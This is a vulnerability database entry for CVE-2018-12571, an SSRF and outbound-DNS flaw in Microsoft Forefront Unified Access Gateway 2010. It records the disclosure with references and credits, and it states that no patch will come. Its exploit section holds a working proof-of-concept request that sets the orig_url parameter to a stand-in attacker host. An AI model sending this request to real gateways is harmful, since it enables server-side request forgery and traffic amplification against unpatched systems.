ID
VAR-E-201807-0093
CVE
| cve_id: | CVE-2018-12571 | Trust: 0.5 |
TITLE
Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction
Trust: 0.5
DESCRIPTION
Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to trigger outbound DNS queries for arbitrary hosts via a comma-separated list of URLs in the orig_url parameter, possibly causing a traffic amplification and/or SSRF outcome.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | microsoft | model: | forefront unified access gateway | scope: | eq | version: | 2010 | Trust: 0.5 |
EXPLOIT
# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# Proof of Concept #1
Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
trigger outbound DNS queries for arbitrary hosts via a comma-separated list
of URLs in the orig_url parameter, possibly causing a traffic amplification
and/or SSRF outcome.
/uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/InternalSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%2D41ae%2D89f1%2D1eb6eff34091&*orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM
<http://2FATTACKER.SITE.COM>%2Ftest*
# Fixes
It will not be patched by Microsoft.
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
arbitrary
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
CREDITS
Okan Coskun
Trust: 0.5
EXTERNAL IDS
| db: | NVD | id: | CVE-2018-12571 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 148389 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-12571 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 148389 |
LAST UPDATE DATE
2022-07-27T09:51:34.014000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 148389 | date: | 2018-07-02T18:29:07 |